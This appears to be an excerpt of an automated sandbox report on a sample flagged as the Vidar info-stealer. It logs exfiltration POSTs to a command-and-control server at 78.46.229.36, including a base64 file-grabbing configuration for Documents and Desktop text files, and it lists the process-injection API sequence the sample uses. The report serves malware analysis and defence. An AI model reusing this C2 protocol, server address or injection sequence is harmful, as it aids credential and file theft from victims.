Destination IP: 78.46.229.36
Destination Port: 443
PID: 7564
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:18 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:18 UTC | 331 | OUT | Data Ascii:
------AFBFHDBKJEGHJJJKFIIJ
Content-Disposition: form-data; name="token"

a5565e153165458783979f8915ce81e0
------AFBFHDBKJEGHJJJKFIIJ
Content-Disposition: form-data; name="build_id"

90027e35f6cb548480a6fb8bd7cde0cf
------AFBFHDBKJEGHJJJKFIIJ
Cont
2024-03-29 11:08:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID: 19
Source IP: 192.168.2.4
Source Port: 49762
Destination IP: 78.46.229.36
Destination Port: 443
PID: 7564
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:19 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:19 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------DHDAFBFCFHIDAKFIIEBACont
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:20 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:20 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49763 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:20 UTC | 310 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:20 UTC | 453 | OUT | Data Ascii: ------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------AFHDBGHJKFIDHJJJEBKECont
2024-03-29 11:08:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:08:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49764 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:22 UTC | 313 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Host: 78.46.229.36
Content-Length: 130713
Connection: Keep-Alive
Cache-Control: no-cache
2024-03-29 11:08:22 UTC | 16355 | OUT | Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GCBGCAFIIECBFIDHIJKFCont
2024-03-29 11:08:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Mar 2024 11:08:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-03-29 11:08:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.44976578.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:24 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIE
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:08:24 UTC | 331 | OUT
                                                                                                                                                                                                                                                  Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------DHIECGCAEBFIIDHIDGIECont
2024-03-29 11:08:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:25 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-03-29 11:08:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49766 | 78.46.229.36 | 443 | 7564 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 11:08:26 UTC | 310 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-03-29 11:08:26 UTC | 331 | OUT
                                                                                                                                                                                                                                                  Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------GHDHDBAECGCAFHJJDAKFCont
2024-03-29 11:08:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-03-29 11:08:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0



                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:12:07:49
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                                                                                  File size:244'360 bytes
                                                                                                                                                                                                                                                  MD5 hash:0CE3DC374E49433D7E15D02C015E0EE3
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:12:07:49
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                  Imagebase:0x210000
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                  Imagebase:0xf50000
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                                                                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:42.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:21.3%
                                                                                                                                                                                                                                                    Total number of Nodes:61
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02EC2280
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02EC2293
                                                                                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02EC22B1
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02EC22D5
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02EC2300
                                                                                                                                                                                                                                                    • TerminateProcess.KERNELBASE(?,00000000), ref: 02EC231F
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02EC2358
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02EC23A3
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02EC23E1
                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC241D
                                                                                                                                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 02EC242C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701753746.0000000002EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2ec1000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                    • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                    • API String ID: 2440066154-977067982
                                                                                                                                                                                                                                                    • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                    • Instruction ID: dcbb0984f3e0cd4de778bc5af713c51576ebbe0009adf5b5bf2a448c187cff6d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75B1E67664024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02D315F8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 544645111-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 596f54085a3ec59c57e41fb939852c5fa1e799e09193368409c7ff10a8f30290
                                                                                                                                                                                                                                                    • Instruction ID: 376e44747149dff568c6da5a93750a1e1cf4aca7903e6711b18a973aa2412d54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596f54085a3ec59c57e41fb939852c5fa1e799e09193368409c7ff10a8f30290
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61327F31A002568FCB16CFA9C480A9DFBF2BF89314F59C559D45AAB352C734EC82CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 149 2d31708-2d31767 151 2d31777-2d317b9 CreateThread 149->151 152 2d31769-2d31775 149->152 154 2d317c2-2d317e7 151->154 155 2d317bb-2d317c1 151->155 152->151 155->154
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 02D317AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 054daf5130d5c8cc9f1fa828028f97a9e010b371ca8a5efaca7a5378dfc83da6
                                                                                                                                                                                                                                                    • Instruction ID: 9778d2deddc866831d3afa9c242395dc982d0cc461a243dfc71c9683eb254102
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 054daf5130d5c8cc9f1fa828028f97a9e010b371ca8a5efaca7a5378dfc83da6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 593103B5A003499FCB10CFA9D984AEEBBF1FF48314F24842AE859A7311C7759954CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 159 2d31710-2d31767 161 2d31777-2d317b9 CreateThread 159->161 162 2d31769-2d31775 159->162 164 2d317c2-2d317e7 161->164 165 2d317bb-2d317c1 161->165 162->161 165->164
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 02D317AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: daceca44a9b2cec2ec50c0658584b3e9d7ac08b3a6ca7fc47da4aef86902a553
                                                                                                                                                                                                                                                    • Instruction ID: 75987c82992b669ad00dc03d4364e96c704dbde54df83b03a3421d4b7fcc963f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daceca44a9b2cec2ec50c0658584b3e9d7ac08b3a6ca7fc47da4aef86902a553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321F3B5A00349DFCB10CFAAD984ADEBBF5FF48314F208429E919A7310C775A954CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 169 2d31578-2d31605 VirtualProtectEx 172 2d31607-2d3160d 169->172 173 2d3160e-2d3163e 169->173 172->173
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02D315F8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 5d85f6f7436f9ffc2e09da158477cb09ea1342c16c07b50f884f86fd6bdd9122
                                                                                                                                                                                                                                                    • Instruction ID: bf99c365b8903d76f116e28d8200f4963a3a0230b656adcbaf45e6002841d59a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d85f6f7436f9ffc2e09da158477cb09ea1342c16c07b50f884f86fd6bdd9122
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C72139B1900259DFCB10DFAAC940ADEFBF5FF48310F108429E559A7250D7389944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 177 2d31651-2d316ca CreateThread 181 2d316d3-2d316f8 177->181 182 2d316cc-2d316d2 177->182 182->181
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?), ref: 02D316BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 836e0defccf42eea89c9921267450dd97eadc1a60e09b26c6bc686da77e2fa60
                                                                                                                                                                                                                                                    • Instruction ID: 880db1d391c97de5a783cf7e86758ff388245bcd92713c59df45f46d9f623cce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 836e0defccf42eea89c9921267450dd97eadc1a60e09b26c6bc686da77e2fa60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 361149B19003898BDB10DFAAC444BDEFFF5EF88324F248459D459A7350CB75A945CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 186 2d31658-2d316ca CreateThread 189 2d316d3-2d316f8 186->189 190 2d316cc-2d316d2 186->190 190->189
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?), ref: 02D316BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 90af5a5a28c7f780077828bf06abbdfed7c446bf6d7536a302a16fc152f737a2
                                                                                                                                                                                                                                                    • Instruction ID: 4df6bca3a0facc3164b12df384d793dfec86ff197cee65c5ac39eac7249ab829
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90af5a5a28c7f780077828bf06abbdfed7c446bf6d7536a302a16fc152f737a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A31116B19002498BCB10DFAAC445BDEFBF5EB88324F248429D459A7250CB75A944CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:4.8%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:10.3%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:40
